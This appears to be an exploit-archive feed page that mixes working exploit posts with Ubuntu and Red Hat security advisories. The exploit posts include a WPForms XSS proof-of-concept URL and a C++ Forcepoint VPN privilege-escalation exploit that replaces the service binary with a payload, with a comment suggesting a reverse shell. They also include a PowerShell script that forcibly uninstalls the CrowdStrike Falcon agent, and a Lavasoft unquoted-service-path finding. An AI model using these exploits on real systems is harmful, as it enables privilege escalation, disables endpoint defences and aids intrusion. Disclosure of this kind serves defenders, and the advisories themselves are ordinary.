WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

Ubuntu Security Notice 5985-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

    ==========================================================================Ubuntu Security Notice USN-5985-1March 29, 2023linux-aws-5.4, linux-azure-5.4, linux-gcp-5.4, linux-hwe-5.4,linux-ibm-5.4, linux-oracle-5.4, linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the System V IPC implementation in the Linux kerneldid not properly handle large shared memory counts. A local attacker coulduse this to cause a denial of service (memory exhaustion). (CVE-2021-3669)It was discovered that the KVM VMX implementation in the Linux kernel didnot properly handle indirect branch prediction isolation between L1 and L2VMs. An attacker in a guest VM could use this to expose sensitiveinformation from the host OS or other guest VMs. (CVE-2022-2196)Gerald Lee discovered that the USB Gadget file system implementation in theLinux kernel contained a race condition, leading to a use-after-freevulnerability in some situations. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2022-4382)It was discovered that the RNDIS USB driver in the Linux kernel containedan integer overflow vulnerability. A local attacker with physical accesscould plug in a malicious USB device to cause a denial of service (systemcrash) or possibly execute arbitrary code. (CVE-2023-23559)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-5.4.0-1046-ibm      5.4.0-1046.51~18.04.1   linux-image-5.4.0-1082-raspi    5.4.0-1082.93~18.04.1   linux-image-5.4.0-1098-oracle   5.4.0-1098.107~18.04.1   linux-image-5.4.0-1099-aws      5.4.0-1099.107~18.04.1   linux-image-5.4.0-1102-gcp      5.4.0-1102.111~18.04.2   linux-image-5.4.0-1105-azure    5.4.0-1105.111~18.04.1   linux-image-5.4.0-146-generic   5.4.0-146.163~18.04.1   linux-image-5.4.0-146-generic-lpae  5.4.0-146.163~18.04.1   linux-image-5.4.0-146-lowlatency  5.4.0-146.163~18.04.1   linux-image-aws                 5.4.0.1099.77   linux-image-azure               5.4.0.1105.78   linux-image-gcp                 5.4.0.1102.78   linux-image-generic-hwe-18.04   5.4.0.146.163~18.04.117   linux-image-generic-lpae-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-ibm                 5.4.0.1046.57   linux-image-lowlatency-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-oem                 5.4.0.146.163~18.04.117   linux-image-oem-osp1            5.4.0.146.163~18.04.117   linux-image-oracle              5.4.0.1098.107~18.04.70   linux-image-raspi-hwe-18.04     5.4.0.1082.79   linux-image-snapdragon-hwe-18.04  5.4.0.146.163~18.04.117   linux-image-virtual-hwe-18.04   5.4.0.146.163~18.04.117After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5985-1   CVE-2021-3669, CVE-2022-2196, CVE-2022-4382, CVE-2023-23559Package Information:   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1099.107~18.04.1   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1105.111~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1102.111~18.04.2   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-146.163~18.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1046.51~18.04.1   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1098.107~18.04.1   https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1082.93~18.04.1

Ubuntu Security Notice USN-5985-1

Forcepoint (Stonesoft VPN Client) versions 6.2.0 and 6.8.0 suffer from a privilege escalation vulnerability.

    # Exploit Author : TOUHAMI KASBAOUI# Vendor Homepage : https://www.forcepoint.com/ # Software: Stonesoft VPN Windows# Version : 6.2.0 / 6.8.0# Tested on : Windows 10# CVE : N/A#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM#define UNICODE#define _UNICODE#include <Windows.h>#include <iostream>using namespace std;enum Result{    unknown,    serviceManager_AccessDenied,    serviceManager_DatabaseDoesNotExist,    service_AccessDenied,    service_InvalidServiceManagerHandle,    service_InvalidServiceName,    service_DoesNotExist,    service_Exist};Result ServiceExists(const std::wstring& serviceName){    Result r = unknown;    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);    if (manager == NULL)    {        DWORD lastError = GetLastError();        if (lastError == ERROR_ACCESS_DENIED)            return serviceManager_AccessDenied;        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)            return serviceManager_DatabaseDoesNotExist;        else            return unknown;    }    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);    if (service == NULL)    {        DWORD error = GetLastError();        if (error == ERROR_ACCESS_DENIED)            r = service_AccessDenied;        else if (error == ERROR_INVALID_HANDLE)            r = service_InvalidServiceManagerHandle;        else if (error == ERROR_INVALID_NAME)            r = service_InvalidServiceName;        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)            r = service_DoesNotExist;        else            r = unknown;    }    else        r = service_Exist;    if (service != NULL)        CloseServiceHandle(service);    if (manager != NULL)        CloseServiceHandle(manager);    return r;}bool ChangeName() {    LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";    LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";    bool success = MoveFile(parrentvpnfilename, newName);    if (success) {        cerr << "[+] SVGVPN filename changed.\n";    }    else {        cerr << "Failed to rename file \n";    }    return 0;}int main() {    const uint8_t shellcode[7168] = {        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    }; //You can set array bin of your reverse shell PE file here    std::wstring serviceName = L"sgipsecvpn";    Result result = ServiceExists(serviceName);    if (result == service_Exist)        std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;    else if (result == service_DoesNotExist)        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;    else        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;    ChangeName();    HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";    if (fileHandle == INVALID_HANDLE_VALUE) {        cerr << "Failed to create shellcode\n";        return 1;    }    DWORD bytesWritten;    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {        cerr << "Failed to write to file\n";        CloseHandle(fileHandle);        return 1;    }    CloseHandle(fileHandle);    cout << "[+] Payload exported to ForcePointVPN \n";    Sleep(30);    cout << "[+] Restart ForcePointVPN Service \n";    SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);    SERVICE_STATUS serviceStatus;    QueryServiceStatus(serviceHandle, &serviceStatus);    if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {        ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);        while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {            QueryServiceStatus(serviceHandle, &serviceStatus);            Sleep(1000);        }    }    StartService(serviceHandle, NULL, NULL);    CloseServiceHandle(serviceHandle);    CloseServiceHandle(scmHandle);    return 0;}

Forcepoint (Stonesoft VPN Client) 6.2.0 / 6.8.0 Local Privilege Escalation

Red Hat Security Advisory 2023-1310-01 - An update is now available for Logging Subsystem for Red Hat OpenShift - 5.5.9. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem for Red Hat OpenShift - 5.5.9 security update  
Advisory ID:       RHSA-2023:1310-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1310  
Issue date:        2023-03-29  
CVE Names:         CVE-2022-4304 CVE-2022-4450 CVE-2022-41717   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-0767   
                   CVE-2023-23916   
=====================================================================

1. Summary:

An update is now available for Logging Subsystem for Red Hat OpenShift -  
5.5.9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.9 - Red Hat OpenShift

Security Fix(es):

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3730 - [release-5.5] /var/log/oauth-server/audit.log not being scraped by log collector

6. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCT+zdzjgjWX9erEAQiEVw//c5kd+CHap30XTR1eL8R3ImnvW9ZmDGF7  
ItrMScIUKbulYWtIs7lzrNQ48sFRWwkI/ue1B97pNUmEqndVwSdKmnOPPmERwS3l  
UYIUZ7tGRFMHLGKHiatoG4lGQF0ye0g+pz3zgye+r8AkHhq6zb8J5PyqvhYJB+i7  
iqOnnx26rQDprJldnwir2N73F0NN6gfU6oLxV2S3OmiRmpQyd4PPd9LX9XVAcS37  
aTbOtnWBv1kJMpWiyIEQ4+NECfKP+PzhPpYtp+Aa/wTyJmvy9WhVjXc9+xEC8xRO  
wTOG+SuNp88b2vbbzHgyhgP4xdbAGWiMqdcTUzBGNb43QN24D8bI9wPMiHMbMrPJ  
n59MfUrFQ8oBmuBNkHN39nyG4xeqr6EcgdoEvql/w7fipxj7a8wCo3R55OYl/K6L  
nplZvuhMrHWzjJvN4gsUt5UdvrFLzNy0nJ+BOXHMLOW+chwyLu3MxhMBqMKFFduv  
rHuPLWgtzh6i2Cw0Zh7RDoEOV0FzNqXP77n12PyX2nm1h9Fu+VRMTBlr8fEAqLtN  
f8KNjI2txd6i0wRITmr3QEfTt87jbFltxTBwGhpAuI8wQod/NpDy6z4ckoqxacIk  
XGkCO66c7kjTl6ewiVwaPg84v/Tcu4kV5eWN/i+BTYXnUo6ps36Xajd7K0On9lgz  
LlzBWtkhNu0=  
=Iy0e  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1310-01

CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.

    # Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token # Date: 30/11/2022 # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) # Vendor Homepage: https://www.crowdstrike.com/ # Author Homepage: https://www.deda.cloud/ # Tested On: All Windows versions # Version: 6.44.15806 # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"foreach($obj in $InstalledSoftware){    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))    {        $uninstall_uuid = $obj.Name.Split("\")[6]    }}$g_msiexec_instances = New-Object System.Collections.ArrayListWrite-Host "[+] Identified installed Falcon: $uninstall_uuid"Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"while($true){  if (get-process -Name "CSFalconService") {    Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {            if (-Not $g_msiexec_instances.contains($_.id)){        $g_msiexec_instances.Add($_.id)        if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){          Start-Sleep -Milliseconds 100          Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]          stop-process -Force -Id $g_msiexec_instances[-1]                }      }        }  } else {     Write-Host "[+] CSFalconService process vanished...reboot and have fun!"    break  }}

CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue

Lavasoft version 4.1.0.409 suffers from an unquoted service path vulnerability.

    #Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path# Author: P4p4 M4n3# Discovery Date: 25-11-2022# Vendor Homepage: https://webcompanion.com/en/# Version 4.1.0.409# Tested on:  Microsoft Windows Server 2019 Datacenter x64# Description:# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path# POC https://youtu.be/yb8AavCMbes #Discover the Unquoted Service pathC:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """DCIService        C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto  C:\Users\p4p4> sc qc DCIService[SC] QueryServiceConfig réussite(s)SERVICE_NAME: DCIService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : DCIService        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

Lavasoft 4.1.0.409 Unquoted Service Path

Red Hat Security Advisory 2023-1512-01 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.10 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.9 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.10 Release Notes for information about the most significant bug fixes and enhancements included in this release. Issues addressed include code execution, denial of service, deserialization, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat JBoss Enterprise Application Platform 7.4.10 on RHEL 7 security update  
Advisory ID:       RHSA-2023:1512-01  
Product:           Red Hat JBoss Enterprise Application Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1512  
Issue date:        2023-03-29  
CVE Names:         CVE-2022-1471 CVE-2022-4492 CVE-2022-38752   
                   CVE-2022-41853 CVE-2022-41854 CVE-2022-41881   
                   CVE-2022-45787 CVE-2023-0482 CVE-2023-1108   
=====================================================================

1. Summary:

A security update is now available for Red Hat JBoss Enterprise Application  
Platform 7.4 for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss EAP 7.4 for RHEL 7 Server - noarch, x86_64

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java  
applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.10 serves  
as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.9  
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise  
Application Platform 7.4.10 Release Notes for information about the most  
significant bug fixes and enhancements included in this release.

Security Fix(es):

* SnakeYaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

* hsqldb: Untrusted input may lead to RCE attack (CVE-2022-41853)

* Undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* undertow: Server identity in https connection is not checked by the  
undertow client (CVE-2022-4492)

* snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode  
(CVE-2022-38752)

* dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)

* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
(CVE-2022-41881)

* apache-james-mime4j: Temporary File Information Disclosure in MIME4J  
TempFileStorageProvider (CVE-2022-45787)

* RESTEasy: creation of insecure temp files (CVE-2023-0482)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2129710 - CVE-2022-38752 snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode  
2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution  
2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow  
2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client  
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider  
2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-23572 - (7.4.z) Upgrade jbossws-spi from 3.3.1.Final-redhat-00001 to 3.4.0.Final-redhat-00001  
JBEAP-24120 - Tracker bug for the EAP 7.4.10 release for RHEL-7  
JBEAP-24172 - (7.4.z) Upgrade jbossws-cxf from 5.4.4.Final-redhat-00001 to 5.4.8.Final-redhat-00001  
JBEAP-24182 - (7.4.z) Upgrade wildfly-http-ejb-client from 1.1.13.SP1-redhat-00001 to 1.1.16.Final-redhat-00002  
JBEAP-24220 - [GSS](7.4.z) Upgrade JBoss Metadata from 13.0.0.Final-redhat-00001 to 13.4.0.Final-redhat-00001  
JBEAP-24254 - JDK17, CLI script to update security doesn't apply to microprofile  
JBEAP-24292 - (7.4.z) Upgrade Artemis Native from 1.0.2.redhat-00001 to 1.0.2.redhat-00004  
JBEAP-24339 - (7.4.z) Upgrade Undertow from 2.2.22.SP3-redhat-00001 to 2.2.23.SP1  
JBEAP-24341 - (7.4.z) Upgrade Ironjacamar from 1.5.10.Final-redhat-00001 to 1.5.11.Final-redhat-00001  
JBEAP-24363 - (7.4.z) Upgrade org.jboss.spec.javax.el:jboss-el-api_3.0_spec from 2.0.0.Final-redhat-00001 to 2.0.1.Final  
JBEAP-24372 - (7.4.z) Upgrade PicketLink from 2.5.5.SP12-redhat-00011 to 2.5.5.SP12-redhat-00012  
JBEAP-24380 - (7.4.z) Upgrade jastow from 2.0.11.Final-redhat-00001 to 2.0.14.Final-redhat-00001  
JBEAP-24383 - [GSS](7.4.z) Upgrade artemis-wildfly-integration from 1.0.4 to 1.0.7  
JBEAP-24384 - (7.4.z) Upgrade netty from 4.1.77.Final-redhat-00001 to 4.1.86.Final  
JBEAP-24385 - (7.4.z) Upgrade WildFly Core from 15.0.22.Final-redhat-00001 to 15.0.23.Final-redhat-00001  
JBEAP-24395 - [GSS](7.4.z) Upgrade jboss-ejb-client from 4.0.49.Final-redhat-00001 to 4.0.50.Final  
JBEAP-24507 - (7.4.z) RESTEASY-3285 Upgrade resteasy 3.15.x to mime4j 0.8.9  
JBEAP-24535 - [GSS](7.4.z) UNDERTOW-2239 - Infinite loop in `SslConduit` during close on JDK 11  
JBEAP-24574 - [PST](7.4.z) Upgrade snakeyaml from 1.33.0.redhat-00001 to 1.33.SP1.redhat-00001  
JBEAP-24588 - [GSS](7.4.z) RHEL9 rpms: yum groupinstall jboss-eap7 installing JDK11 instead of JDK8 with EAP 7.4 Update 9  
JBEAP-24605 - [PST](7.4.z) Upgrade undertow from 2.2.23.SP1-redhat-00001 to 2.2.23.SP2  
JBEAP-24618 - (7.4.z) Upgrade WildFly Core from 15.0.23.Final-redhat-00001 to 15.0.25.Final-redhat-00001

7. Package List:

Red Hat JBoss EAP 7.4 for RHEL 7 Server:

Source:  
eap7-activemq-artemis-native-1.0.2-3.redhat_00004.1.el7eap.src.rpm  
eap7-apache-mime4j-0.8.9-1.redhat_00001.1.el7eap.src.rpm  
eap7-artemis-native-1.0.2-4.redhat_00004.1.el7eap.src.rpm  
eap7-artemis-wildfly-integration-1.0.7-1.redhat_00001.1.el7eap.src.rpm  
eap7-infinispan-11.0.17-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-ironjacamar-1.5.11-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-ejb-client-4.0.50-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-el-api_3.0_spec-2.0.1-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-metadata-13.4.0-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jboss-server-migration-1.10.0-26.Final_redhat_00025.1.el7eap.src.rpm  
eap7-jbossws-cxf-5.4.8-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-jbossws-spi-3.4.0-2.Final_redhat_00001.1.el7eap.src.rpm  
eap7-netty-4.1.86-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-netty-transport-native-epoll-4.1.86-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-picketlink-federation-2.5.5-22.SP12_redhat_00012.1.el7eap.src.rpm  
eap7-resteasy-3.15.5-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-snakeyaml-1.33.0-2.SP1_redhat_00001.1.el7eap.src.rpm  
eap7-undertow-2.2.23-1.SP2_redhat_00001.1.el7eap.src.rpm  
eap7-undertow-jastow-2.0.14-1.Final_redhat_00001.1.el7eap.src.rpm  
eap7-wildfly-7.4.10-6.GA_redhat_00002.1.el7eap.src.rpm  
eap7-wildfly-http-client-1.1.16-1.Final_redhat_00002.1.el7eap.src.rpm

noarch:  
eap7-activemq-artemis-native-1.0.2-3.redhat_00004.1.el7eap.noarch.rpm  
eap7-apache-mime4j-0.8.9-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-artemis-wildfly-integration-1.0.7-1.redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-cachestore-jdbc-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-cachestore-remote-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-client-hotrod-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-commons-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-component-annotations-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-core-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-hibernate-cache-commons-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-hibernate-cache-spi-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-infinispan-hibernate-cache-v53-11.0.17-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-common-api-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-common-impl-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-common-spi-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-core-api-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-core-impl-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-deployers-common-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-jdbc-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-ironjacamar-validator-1.5.11-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-ejb-client-4.0.50-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-el-api_3.0_spec-2.0.1-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-appclient-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-common-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-ear-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-ejb-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-metadata-web-13.4.0-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-cli-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm  
eap7-jboss-server-migration-core-1.10.0-26.Final_redhat_00025.1.el7eap.noarch.rpm  
eap7-jbossws-cxf-5.4.8-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-jbossws-spi-3.4.0-2.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-all-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-buffer-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-dns-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-haproxy-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-http-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-http2-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-memcache-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-mqtt-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-redis-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-smtp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-socks-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-stomp-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-codec-xml-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-common-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-handler-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-handler-proxy-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-resolver-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
eap7-netty-resolver-dns-4.1.86-1.Final_redhat_00001.1.el7eap.noarch.rpm  
